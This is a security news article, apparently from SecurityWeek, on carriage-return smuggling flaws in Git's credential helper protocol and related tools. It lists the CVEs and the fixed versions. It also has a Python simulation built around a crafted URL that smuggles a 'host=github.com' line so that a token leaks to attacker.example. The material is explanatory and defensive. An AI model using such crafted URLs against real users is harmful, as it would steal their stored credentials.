RyotaK, a security researcher, has identified critical vulnerabilities in the way Git and its credential helpers exchange credentials, which could allow attackers to leak users' stored credentials. The flaw is a carriage return smuggling bug: Git's credential helper protocol is line-based, and Git rejected newline characters in values taken from a URL but not carriage returns. A percent-encoded carriage return (%0D) in a crafted URL is decoded before the value is written to the helper, and a helper whose line reader treats a lone carriage return as a line terminator sees an extra, attacker-controlled line in the protocol stream.
Git's credential protocol consists of key=value lines (protocol, host, username, path and so on) written to a helper's standard input; the helper, which may be a password manager or another credential store, answers with the matching credential. Because Git decodes the URL before writing these lines, a URL carrying %0D can inject a second host= line, so the helper returns credentials for a trusted host such as github.com and Git then sends them to the attacker's server. A related but separate issue is that Git's interactive credential prompt printed attacker-controlled URL text verbatim, so ANSI escape sequences in a URL could rewrite the prompt and mislead the user about which host is asking for a password.
Several CVEs were assigned across the affected projects:
1. **CVE-2024-52006 and CVE-2024-50349** in Git itself: the first is the carriage return smuggling bug in the credential helper protocol; the second is the ANSI escape sequence problem in the credential prompt. Both are fixed in Git 2.48.1.
2. **CVE-2024-50338** in Git Credential Manager (fixed in 2.6.1) and **CVE-2024-53263** in Git LFS (fixed in 3.6.1): both tools could be made to hand out credentials for the wrong host when a carriage return was smuggled into the request.
3. **CVE-2025-23040** in GitHub Desktop: the same carriage return smuggling bug in the credential handling it bundles.
To mitigate these risks, Git 2.48.1 now refuses to pass URL components containing a carriage return to credential helpers (controlled by the new credential.protectProtocol setting, enabled by default) and sanitises the URL shown in its credential prompt. Git LFS 3.6.1 and Git Credential Manager 2.6.1 apply corresponding fixes on the helper side. Note that upgrading Git alone only protects requests Git itself issues; tools that speak the credential protocol on their own, such as Git LFS and GitHub Desktop, must be updated separately.
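The following Python simulation, added here as an illustration and not code from Git, Git LFS, Git Credential Manager or GitHub Desktop, shows the bug class described above and the two places it can be closed. It models Git's URL-to-protocol step with and without the carriage return check, a helper whose line reader treats a lone carriage return as a line terminator, and a strict helper. The attacker URL, the stored token and the store contents are constructed samples; the position of the %0D (in the userinfo part of the URL) is an assumption chosen so that the network host stays a normal hostname.

```python
"""Simulation of carriage-return smuggling in Git's line-based credential
helper protocol. Constructed to illustrate the bug class; it is not code
from Git, Git LFS, Git Credential Manager or GitHub Desktop."""
from urllib.parse import unquote, urlsplit


class ProtocolError(ValueError):
    """Raised when a value cannot be represented safely in the protocol."""


# Constructed sample store: a helper that remembers a GitHub token.
STORE = {"github.com": ("octocat", "ghp_EXAMPLE_NOT_A_REAL_TOKEN")}


def credential_request(url, protect_protocol=True, use_http_path=False):
    """Return the key=value lines Git writes to a helper for `url`.

    Git percent-decodes URL components before writing them. Before the fix
    only '\\n' was rejected, so a '\\r' (%0D) survived into the stream; with
    protect_protocol=True (the hardened behaviour, modelled on the check
    Git 2.48.1 added under credential.protectProtocol) '\\r' is rejected too.
    """
    parts = urlsplit(url)
    fields = [("protocol", parts.scheme), ("host", unquote(parts.hostname or ""))]
    if parts.username is not None:
        fields.append(("username", unquote(parts.username)))
    if use_http_path:
        fields.append(("path", unquote(parts.path.lstrip("/"))))
    for key, value in fields:
        if "\n" in value:
            raise ProtocolError(f"newline in {key}")
        if protect_protocol and "\r" in value:
            raise ProtocolError(f"carriage return in {key}")
    return "".join(f"{key}={value}\n" for key, value in fields)


def parse_cr_tolerant(stream):
    """Parse the request the way a line reader that treats a lone '\\r' as a
    line terminator does. Later keys overwrite earlier ones, which is what
    lets a smuggled 'host=' line win."""
    attrs = {}
    for line in stream.replace("\r", "\n").split("\n"):
        if line:
            key, _, value = line.partition("=")
            attrs[key] = value
    return attrs


def parse_strict(stream):
    """Split on '\\n' only and refuse any line that still contains '\\r'."""
    attrs = {}
    for line in stream.split("\n"):
        if not line:
            continue
        if "\r" in line:
            raise ProtocolError("carriage return in credential request")
        key, _, value = line.partition("=")
        attrs[key] = value
    return attrs


def helper_get(stream, parser):
    """Answer a 'get' request: look up the stored credential for the host."""
    attrs = parser(stream)
    return STORE.get(attrs.get("host"))


# Constructed attacker URL: the percent-encoded CR sits in the userinfo, so the
# connection still goes to attacker.example, but the decoded username becomes
# "user\rhost=github.com" and a CR-tolerant helper reads a second host= line.
EVIL_URL = "https://user%0Dhost=github.com@attacker.example/repo.git"


def demo():
    """Return (credential leaked to attacker, rejected by hardened Git,
    rejected by strict helper)."""
    unpatched = credential_request(EVIL_URL, protect_protocol=False)
    leaked = helper_get(unpatched, parse_cr_tolerant)  # github.com token
    try:
        credential_request(EVIL_URL)  # hardened Git refuses to write the CR
        rejected_by_git = False
    except ProtocolError:
        rejected_by_git = True
    try:
        helper_get(unpatched, parse_strict)  # strict helper refuses to read it
        rejected_by_helper = False
    except ProtocolError:
        rejected_by_helper = True
    return leaked, rejected_by_git, rejected_by_helper


if __name__ == "__main__":
    print(demo())
```

Running the block shows the unpatched pairing handing the github.com token to a request that will be sent to attacker.example, while either the hardened Git-side check or the strict helper stops it. Both sides matter in practice: the Git fix does nothing for tools that write the protocol themselves, and a helper fix does nothing for a helper that still splits on carriage returns.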
Previously, RyotaK found related credential leaks in GitHub Codespaces and the GitHub CLI, where an attacker could obtain tokens by having a victim clone a malicious repository or through improper decoding of a host parameter. Together these findings show how fragile trust boundaries around credential handling are when untrusted URL data is passed between tools.
In response, GitHub has patched the affected products across its product lines; users should update Git, Git LFS, Git Credential Manager and GitHub Desktop to the fixed versions rather than relying on any single component's fix.
Source: https://www.securityweek.com/git-vulnerabilities-led-to-credentials-exposure